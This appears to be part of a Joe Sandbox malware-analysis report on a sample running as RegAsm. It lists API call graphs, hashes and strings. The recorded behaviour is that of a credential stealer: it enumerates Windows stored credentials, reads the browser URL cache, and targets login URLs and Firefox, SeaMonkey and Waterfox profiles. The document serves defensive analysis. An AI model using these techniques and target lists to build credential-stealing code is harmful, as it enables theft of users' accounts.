                                                                                  • CloseHandle.KERNEL32(00000000), ref: 0040E143
                                                                                  • CloseHandle.KERNEL32(?), ref: 0040E148
                                                                                  • CloseHandle.KERNEL32(?), ref: 0040E14D
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000D.00000002.2590492024.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                  Similarity
                                                                                  • API ID: File$Handle$Close$CreateProcess$CurrentTempView$??2@DirectoryDuplicateInformationMappingNameOpenPathQuerySizeSystemUnmapWindowsWrite_wcsicmpmemset
                                                                                  • String ID: bhv
                                                                                  • API String ID: 4234240956-2689659898
                                                                                  • Opcode ID: c96677cf1f2b88af9f6f98c954d74ea01aac065ab95576d822b7ccb478d5ef78
                                                                                  • Instruction ID: 69536691d8562172d0558c987aea6dfe4ed17d6a9a6de0cf2c6621a9a97a0e87
                                                                                  • Opcode Fuzzy Hash: c96677cf1f2b88af9f6f98c954d74ea01aac065ab95576d822b7ccb478d5ef78
                                                                                  • Instruction Fuzzy Hash: 15412775800218FBCF119FA6CC489DFBFB9FF09750F148466F504A6250D7748A50CBA8

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 634 413f4f-413f52 635 413fa5 634->635 636 413f54-413f5a call 40a804 634->636 638 413f5f-413fa4 GetProcAddress * 5 636->638 638->635
                                                                                  APIs
                                                                                    • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                    • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                                    • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                    • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                    • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                                    • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                                  • GetProcAddress.KERNEL32(00000000,psapi.dll), ref: 00413F6F
                                                                                  • GetProcAddress.KERNEL32(?,EnumProcessModules), ref: 00413F7B
                                                                                  • GetProcAddress.KERNEL32(?,GetModuleFileNameExW), ref: 00413F87
                                                                                  • GetProcAddress.KERNEL32(?,EnumProcesses), ref: 00413F93
                                                                                  • GetProcAddress.KERNEL32(?,GetModuleInformation), ref: 00413F9F
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000D.00000002.2590492024.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                  Similarity
                                                                                  • API ID: AddressProc$LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                                                                                  • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll
                                                                                  • API String ID: 2941347001-70141382
                                                                                  • Opcode ID: 39c22376907c33733211e363db3c4349312dc982ad78c4cc463d34b505bb12c7
                                                                                  • Instruction ID: 7b3d606b7d389a8205b465373562f67d85acf78e859b2fe1c5436fc88fb80995
                                                                                  • Opcode Fuzzy Hash: 39c22376907c33733211e363db3c4349312dc982ad78c4cc463d34b505bb12c7
                                                                                  • Instruction Fuzzy Hash: BBF03470840340AECB706F769809E06BEF0EFD8B097318C2EE6C557291E3BD9098DE48

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 639 4466f4-44670e call 446904 GetModuleHandleA 642 446710-44671b 639->642 643 44672f-446732 639->643 642->643 644 44671d-446726 642->644 645 44675b-4467aa __set_app_type __p__fmode __p__commode call 4153f2 643->645 646 446747-44674b 644->646 647 446728-44672d 644->647 652 4467ac-4467b7 __setusermatherr 645->652 653 4467b8-44680e call 4468f0 _initterm __wgetmainargs _initterm 645->653 646->643 651 44674d-44674f 646->651 647->643 650 446734-44673b 647->650 650->643 654 44673d-446745 650->654 655 446755-446758 651->655 652->653 658 446810-446819 653->658 659 44681e-446825 653->659 654->655 655->645 660 4468d8-4468dd call 44693d 658->660 661 446827-446832 659->661 662 44686c-446870 659->662 665 446834-446838 661->665 666 44683a-44683e 661->666 663 446845-44684b 662->663 664 446872-446877 662->664 670 446853-446864 GetStartupInfoW 663->670 671 44684d-446851 663->671 664->662 665->661 665->666 666->663 668 446840-446842 666->668 668->663 672 446866-44686a 670->672 673 446879-44687b 670->673 671->668 671->670 674 44687c-446894 GetModuleHandleA call 41276d 672->674 673->674 677 446896-446897 exit 674->677 678 44689d-4468d6 _cexit 674->678 677->678 678->660
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000D.00000002.2590492024.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                  Similarity
                                                                                  • API ID: HandleModule_initterm$InfoStartup__p__commode__p__fmode__set_app_type__setusermatherr__wgetmainargs_cexitexit
                                                                                  • String ID:
                                                                                  • API String ID: 2827331108-0
                                                                                  • Opcode ID: 7ba7b2652c13871cd0d5cae79e0f4a701fe2602556b2c3d333f15f3a91922bbb
                                                                                  • Instruction ID: 0e3254bf032efe29fc581ce6ca9889a5a3d5d0d8e47fd2ea34fa35870f4f4cb9
                                                                                  • Opcode Fuzzy Hash: 7ba7b2652c13871cd0d5cae79e0f4a701fe2602556b2c3d333f15f3a91922bbb
                                                                                  • Instruction Fuzzy Hash: 9D51C474C41314DFEB21AF65D8499AD7BB0FB0A715F21452BE82197291D7788C82CF1E

                                                                                  Control-flow Graph

                                                                                  APIs
                                                                                  • memset.MSVCRT ref: 0040C298
                                                                                    • Part of subcall function 0040E5ED: memset.MSVCRT ref: 0040E60F
                                                                                    • Part of subcall function 0040E5ED: memset.MSVCRT ref: 0040E629
                                                                                    • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000001,00000001,00401E7F), ref: 0040AFD8
                                                                                  • FindFirstUrlCacheEntryW.WININET(visited:,?,80000001), ref: 0040C30D
                                                                                  • wcschr.MSVCRT ref: 0040C324
                                                                                  • wcschr.MSVCRT ref: 0040C344
                                                                                  • FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C369
                                                                                  • GetLastError.KERNEL32 ref: 0040C373
                                                                                  • FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C39F
                                                                                  • FindCloseUrlCache.WININET(?), ref: 0040C3B0
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000D.00000002.2590492024.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                  Similarity
                                                                                  • API ID: CacheFind$Entrymemset$Nextwcschr$??2@CloseErrorFirstLast
                                                                                  • String ID: visited:
                                                                                  • API String ID: 1157525455-1702587658
                                                                                  • Opcode ID: e6e827466474dba504c602eadc9ccabadb05f86476a5423d269347cfbfdac146
                                                                                  • Instruction ID: 6629d855392f08d41decd2a192e4b6579142cf3eaa95f33c860a05aa0b18639b
                                                                                  • Opcode Fuzzy Hash: e6e827466474dba504c602eadc9ccabadb05f86476a5423d269347cfbfdac146
                                                                                  • Instruction Fuzzy Hash: DA417F71D00219ABDB10EF92DC85AEFBBB8FF45714F10416AE904F7281D7389A45CBA9

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 705 40e175-40e1a1 call 40695d call 406b90 710 40e1a7-40e1e5 memset 705->710 711 40e299-40e2a8 call 4069a3 705->711 713 40e1e8-40e1fa call 406e8f 710->713 717 40e270-40e27d call 406b53 713->717 718 40e1fc-40e219 call 40dd50 * 2 713->718 717->713 724 40e283-40e286 717->724 718->717 729 40e21b-40e21d 718->729 725 40e291-40e294 call 40aa04 724->725 726 40e288-40e290 free 724->726 725->711 726->725 729->717 730 40e21f-40e235 call 40742e 729->730 730->717 733 40e237-40e242 call 40aae3 730->733 733->717 736 40e244-40e26b _snwprintf call 40a8d0 733->736 736->717
                                                                                  APIs
                                                                                    • Part of subcall function 00406B90: _wcsicmp.MSVCRT ref: 00406BC1
                                                                                  • memset.MSVCRT ref: 0040E1BD
                                                                                    • Part of subcall function 00406E8F: memset.MSVCRT ref: 00406F8B
                                                                                  • free.MSVCRT ref: 0040E28B
                                                                                    • Part of subcall function 0040DD50: _wcsicmp.MSVCRT ref: 0040DD69
                                                                                    • Part of subcall function 0040AAE3: wcslen.MSVCRT ref: 0040AAF2
                                                                                    • Part of subcall function 0040AAE3: _memicmp.MSVCRT ref: 0040AB20
                                                                                  • _snwprintf.MSVCRT ref: 0040E257
                                                                                    • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                                                                    • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A908
                                                                                    • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A92B
                                                                                    • Part of subcall function 0040A8D0: memcpy.MSVCRT(?,?,000000FF,00000000,?,?,00000000,?,0040320A,00000000,000000FF), ref: 0040A94F
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000D.00000002.2590492024.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                  Similarity
                                                                                  • API ID: free$_wcsicmpmemsetwcslen$_memicmp_snwprintfmemcpy
                                                                                  • String ID: $ContainerId$Container_%I64d$Containers$Name
                                                                                  • API String ID: 2804212203-2982631422
                                                                                  • Opcode ID: 67bf6793a8a24478111131d0933ad52acf75e9ebe0c68e3797be97197fd61ec5
                                                                                  • Instruction ID: de93d03617a61f3aa6bbe184beafcfad76b4f566d35596b706efacabd7485ccb
                                                                                  • Opcode Fuzzy Hash: 67bf6793a8a24478111131d0933ad52acf75e9ebe0c68e3797be97197fd61ec5
                                                                                  • Instruction Fuzzy Hash: 74318272D002196ADF10EFA6DC45ADEB7B8AF04344F1105BFE508B3191DB38AE598F99

                                                                                  Control-flow Graph

                                                                                  APIs
                                                                                    • Part of subcall function 0040CC26: GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                                                                                    • Part of subcall function 0040CC26: CloseHandle.KERNELBASE(?,?,000000FF,0000FDE9), ref: 0040CC98
                                                                                    • Part of subcall function 0040CCF0: _wcsicmp.MSVCRT ref: 0040CD2A
                                                                                  • memset.MSVCRT ref: 0040BC75
                                                                                  • memset.MSVCRT ref: 0040BC8C
                                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,0044E518,000000FF,?,00000FFF,00000000,00000000,?,?,?,0040B7D4,?,?), ref: 0040BCA8
                                                                                  • memcmp.MSVCRT(?,00000000,00000005,?,?,?,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE), ref: 0040BCD6
                                                                                  • memcpy.MSVCRT(00000024,?,00000020,?,00000000,00000000,?,?,?,?,?,?,?,0040B7D4), ref: 0040BD2B
                                                                                  • LocalFree.KERNEL32(?,?,00000000,00000000,?,?,?,?,?,?,?,0040B7D4), ref: 0040BD3D
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000D.00000002.2590492024.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                  Similarity
                                                                                  • API ID: memset$ByteCharCloseFileFreeHandleLocalMultiSizeWide_wcsicmpmemcmpmemcpy
                                                                                  • String ID:
                                                                                  • API String ID: 115830560-3916222277
                                                                                  • Opcode ID: 2c6b40c8534ef55c53201c5afea9c0c191c5eda6ef18d79290db5ec64fa84378
                                                                                  • Instruction ID: 00a8249a540342db609c93f8c1f67c79963b4134db5221072d0e6ece1bb2d715
                                                                                  • Opcode Fuzzy Hash: 2c6b40c8534ef55c53201c5afea9c0c191c5eda6ef18d79290db5ec64fa84378
                                                                                  • Instruction Fuzzy Hash: 3F41B372900219ABDB10ABA5CC85ADEB7ACEF04314F01057BB509F7292D7789E45CA99

                                                                                  Control-flow Graph

                                                                                  APIs
                                                                                  • memset.MSVCRT ref: 0041249C
                                                                                  • ??2@YAPAXI@Z.MSVCRT(00002A88), ref: 004124D2
                                                                                  • ??2@YAPAXI@Z.MSVCRT(00000350), ref: 00412510
                                                                                  • GetModuleHandleW.KERNEL32(00000000,0000000E), ref: 00412582
                                                                                  • LoadIconW.USER32(00000000,00000065), ref: 0041258B
                                                                                  • wcscpy.MSVCRT ref: 004125A0
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000D.00000002.2590492024.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                  Similarity
                                                                                  • API ID: ??2@$HandleIconLoadModulememsetwcscpy
                                                                                  • String ID: r!A
                                                                                  • API String ID: 2791114272-628097481
                                                                                  • Opcode ID: c8dffcb2de6473715ddac6d72e3c76979a49d8854762dd44dbb162fd21f04a95
                                                                                  • Instruction ID: f2e108ad35b37ee9f58e8ef6409d1766b43f0b07df47584fb449e80907097569
                                                                                  • Opcode Fuzzy Hash: c8dffcb2de6473715ddac6d72e3c76979a49d8854762dd44dbb162fd21f04a95
                                                                                  • Instruction Fuzzy Hash: 0431A1B19013889FEB30EF669C896CAB7E8FF44314F00852FE90CCB241DBB946548B49

                                                                                  Control-flow Graph

                                                                                  APIs
                                                                                    • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1AE
                                                                                    • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1B6
                                                                                    • Part of subcall function 0040AA04: free.MSVCRT ref: 0040AA0B
                                                                                    • Part of subcall function 0040C274: memset.MSVCRT ref: 0040C298
                                                                                    • Part of subcall function 0040C274: FindFirstUrlCacheEntryW.WININET(visited:,?,80000001), ref: 0040C30D
                                                                                    • Part of subcall function 0040C274: wcschr.MSVCRT ref: 0040C324
                                                                                    • Part of subcall function 0040C274: wcschr.MSVCRT ref: 0040C344
                                                                                    • Part of subcall function 0040C274: FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C369
                                                                                    • Part of subcall function 0040C274: GetLastError.KERNEL32 ref: 0040C373
                                                                                    • Part of subcall function 0040C3C3: memset.MSVCRT ref: 0040C439
                                                                                    • Part of subcall function 0040C3C3: RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,?,?,00000000,?), ref: 0040C467
                                                                                    • Part of subcall function 0040C3C3: _wcsupr.MSVCRT ref: 0040C481
                                                                                    • Part of subcall function 0040C3C3: memset.MSVCRT ref: 0040C4D0
                                                                                    • Part of subcall function 0040C3C3: RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,000000FF,?,?,?,?,00000000), ref: 0040C4FB
                                                                                  • _wcslwr.MSVCRT ref: 0040C817
                                                                                    • Part of subcall function 0040C634: wcslen.MSVCRT ref: 0040C65F
                                                                                    • Part of subcall function 0040C634: memset.MSVCRT ref: 0040C6BF
                                                                                  • wcslen.MSVCRT ref: 0040C82C
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000D.00000002.2590492024.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                  Similarity
                                                                                  • API ID: memset$free$CacheEntryEnumFindValuewcschrwcslen$ErrorFirstLastNext_wcslwr_wcsupr
                                                                                  • String ID: /$/$http://www.facebook.com/$https://login.yahoo.com/config/login$https://www.google.com/accounts/servicelogin
                                                                                  • API String ID: 2936932814-4196376884
                                                                                  • Opcode ID: 2e55d37c3c93c49036042ab263f5962c07f69a8f438a79de627d7f97dd271f33
                                                                                  • Instruction ID: 5b72bd72183a146cc5fb8da473a5bce975bbff0c760a192580a28ed18ba85502
                                                                                  • Opcode Fuzzy Hash: 2e55d37c3c93c49036042ab263f5962c07f69a8f438a79de627d7f97dd271f33
                                                                                  • Instruction Fuzzy Hash: 42218272A00244A6CF10BB6A9C8589E7B68EF44744B10457BB804B7293D67CDE85DB9D

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 847 40b58d-40b59e 848 40b5a4-40b5c0 GetModuleHandleW FindResourceW 847->848 849 40b62e-40b632 847->849 850 40b5c2-40b5ce LoadResource 848->850 851 40b5e7 848->851 850->851 852 40b5d0-40b5e5 SizeofResource LockResource 850->852 853 40b5e9-40b5eb 851->853 852->853 853->849 854 40b5ed-40b5ef 853->854 854->849 855 40b5f1-40b629 call 40afcf memcpy call 40b4d3 call 40b3c1 call 40b04b 854->855 855->849
                                                                                  APIs
                                                                                  • GetModuleHandleW.KERNEL32(00000000,00000000,?,?), ref: 0040B5A5
                                                                                  • FindResourceW.KERNELBASE(00000000,00000032,BIN), ref: 0040B5B6
                                                                                  • LoadResource.KERNEL32(00000000,00000000), ref: 0040B5C4
                                                                                  • SizeofResource.KERNEL32(?,00000000), ref: 0040B5D4
                                                                                  • LockResource.KERNEL32(00000000), ref: 0040B5DD
                                                                                  • memcpy.MSVCRT(00000000,00000000,00000000), ref: 0040B60D
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000D.00000002.2590492024.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                  Similarity
                                                                                  • API ID: Resource$FindHandleLoadLockModuleSizeofmemcpy
                                                                                  • String ID: BIN
                                                                                  • API String ID: 1668488027-1015027815
                                                                                  • Opcode ID: 6cadd12acd146c90b5568bc01b4485451bf9b169e768bef5838699a2d497f07b
                                                                                  • Instruction ID: e905eb6dc449d61379ecdc49350c1a2f8866219970738eecada31b95dd052af9
                                                                                  • Opcode Fuzzy Hash: 6cadd12acd146c90b5568bc01b4485451bf9b169e768bef5838699a2d497f07b
                                                                                  • Instruction Fuzzy Hash: 5E11C636C00225BBD7116BE2DC09AAFBA78FF85755F010476F81072292DB794D018BED
                                                                                  APIs
                                                                                    • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 00404398
                                                                                    • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043AC
                                                                                    • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043BF
                                                                                    • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043D3
                                                                                    • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043E7
                                                                                  • CredEnumerateW.SECHOST(00000000,00000000,?,?,?,00000000,?), ref: 0040BDE9
                                                                                  • wcslen.MSVCRT ref: 0040BE06
                                                                                  • wcsncmp.MSVCRT ref: 0040BE38
                                                                                  • memset.MSVCRT ref: 0040BE91
                                                                                  • memcpy.MSVCRT(?,?,?,00000001,?,?,?,00000000,?), ref: 0040BEB2
                                                                                  • _wcsnicmp.MSVCRT ref: 0040BEFC
                                                                                  • wcschr.MSVCRT ref: 0040BF24
                                                                                  • LocalFree.KERNEL32(?,?,?,?,00000001,?,?,?,00000000,?), ref: 0040BF48
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000D.00000002.2590492024.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                  Similarity
                                                                                  • API ID: AddressProc$CredEnumerateFreeLocal_wcsnicmpmemcpymemsetwcschrwcslenwcsncmp
                                                                                  • String ID:
                                                                                  • API String ID: 697348961-0
                                                                                  • Opcode ID: 4320d3521706fdf8c6ed48fb05be967b0956d3d4dbd01890db6896aba47bd834
                                                                                  • Instruction ID: 79a9ca8399314c5bcb3e205da5602351372edcdcc58f79068602210d8f55f42f
                                                                                  • Opcode Fuzzy Hash: 4320d3521706fdf8c6ed48fb05be967b0956d3d4dbd01890db6896aba47bd834
                                                                                  • Instruction Fuzzy Hash: 1851E9B5D002099FCF20DFA5C8859AEBBF9FF48304F10452AE919F7251E734A9458F69
                                                                                  APIs
                                                                                  • memset.MSVCRT ref: 00403CBF
                                                                                  • memset.MSVCRT ref: 00403CD4
                                                                                  • memset.MSVCRT ref: 00403CE9
                                                                                  • memset.MSVCRT ref: 00403CFE
                                                                                  • memset.MSVCRT ref: 00403D13
                                                                                    • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                                    • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                                    • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                    • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                    • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                    • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                    • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                                                                    • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                                                                    • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                                                                    • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                                                                    • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                                                                    • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                                                                    • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                                                                  • memset.MSVCRT ref: 00403DDA
                                                                                    • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                                    • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,00000104,?,0040BAA5,00445FAE), ref: 004099E3
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000D.00000002.2590492024.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                  Similarity
                                                                                  • API ID: memset$wcscpy$wcslen$_snwprintfmemcpywcscat
                                                                                  • String ID: Waterfox$Waterfox\Profiles
                                                                                  • API String ID: 1829478387-11920434
                                                                                  • Opcode ID: fa7a89f4834ef8b5b40aee994800d4865c67d250ea9d7d7a0362dcd02f226988
                                                                                  • Instruction ID: d72014143a293005b417e5222852f61d3cfc405123c5957a7e6d01a12b636873
                                                                                  • Opcode Fuzzy Hash: fa7a89f4834ef8b5b40aee994800d4865c67d250ea9d7d7a0362dcd02f226988
                                                                                  • Instruction Fuzzy Hash: 1E4133B294012C7ADB20EB56DC85ECF777CEF85314F1180ABB509B2181DA745B948FAA
                                                                                  APIs
                                                                                  • memset.MSVCRT ref: 00403E50
                                                                                  • memset.MSVCRT ref: 00403E65
                                                                                  • memset.MSVCRT ref: 00403E7A
                                                                                  • memset.MSVCRT ref: 00403E8F
                                                                                  • memset.MSVCRT ref: 00403EA4
                                                                                    • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                                    • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                                    • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                    • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                    • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                    • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                    • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                                                                    • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                                                                    • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                                                                    • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                                                                    • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                                                                    • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                                                                    • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                                                                  • memset.MSVCRT ref: 00403F6B
                                                                                    • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                                    • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,00000104,?,0040BAA5,00445FAE), ref: 004099E3
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000D.00000002.2590492024.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                  Similarity
                                                                                  • API ID: memset$wcscpy$wcslen$_snwprintfmemcpywcscat
                                                                                  • String ID: Mozilla\SeaMonkey$Mozilla\SeaMonkey\Profiles
                                                                                  • API String ID: 1829478387-2068335096
                                                                                  • Opcode ID: 4e0f951fde323d6a6ece029bc301e1d43e2d4c472937678d86f27e99a49f71a6
                                                                                  • Instruction ID: badb9319ce56d3a3e0b5d4601891faab39f88fc9b3936f94b46873e2979bc7df
                                                                                  • Opcode Fuzzy Hash: 4e0f951fde323d6a6ece029bc301e1d43e2d4c472937678d86f27e99a49f71a6
                                                                                  • Instruction Fuzzy Hash: F94133B294012CBADB20EB56DC85FCF777CAF85314F1180A7B509F2181DA785B848F6A
                                                                                  APIs
                                                                                  • memset.MSVCRT ref: 00403FE1
                                                                                  • memset.MSVCRT ref: 00403FF6
                                                                                  • memset.MSVCRT ref: 0040400B
                                                                                  • memset.MSVCRT ref: 00404020
                                                                                  • memset.MSVCRT ref: 00404035
                                                                                    • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                                    • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                                    • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                    • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                    • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                    • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                    • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                                                                    • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                                                                    • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                                                                    • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                                                                    • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                                                                    • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                                                                    • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                                                                  • memset.MSVCRT ref: 004040FC
                                                                                    • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                                    • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,00000104,?,0040BAA5,00445FAE), ref: 004099E3
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000D.00000002.2590492024.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                  Similarity
                                                                                  • API ID: memset$wcscpy$wcslen$_snwprintfmemcpywcscat
                                                                                  • String ID: Mozilla\Firefox$Mozilla\Firefox\Profiles
                                                                                  • API String ID: 1829478387-3369679110
                                                                                  • Opcode ID: e8b210b2701fced3ec1563677da70e7bdaed7d27e85ea88c95246b73557c45d8
                                                                                  • Instruction ID: a33c26704871042caa7cb74448a1974e70df039046fe21947f04a6d8cbe9f93a
                                                                                  • Opcode Fuzzy Hash: e8b210b2701fced3ec1563677da70e7bdaed7d27e85ea88c95246b73557c45d8
                                                                                  • Instruction Fuzzy Hash: 354134B294012CBADB20EB56DC85ECF777CAF85314F1180A7B509B3181EA745B948F6A
                                                                                  APIs
                                                                                  • memcpy.MSVCRT(00000048,00451D40,0000002C,000003FF,00445FAE,?,00000000,?,0040B879), ref: 004444E3
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000D.00000002.2590492024.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                  Similarity
                                                                                  • API ID: memcpy
                                                                                  • String ID: BINARY$NOCASE$RTRIM$main$no such vfs: %s$temp
                                                                                  • API String ID: 3510742995-2641926074
                                                                                  • Opcode ID: 821e0fdd347fba4e0959882d1eed221cd0f9849de050a87fd0c537b7ccc40074
                                                                                  • Instruction ID: 565814064bb2237b40e40c3ad6633df45ffc5137317807aec9a32ad89077b3bf
                                                                                  • Opcode Fuzzy Hash: 821e0fdd347fba4e0959882d1eed221cd0f9849de050a87fd0c537b7ccc40074
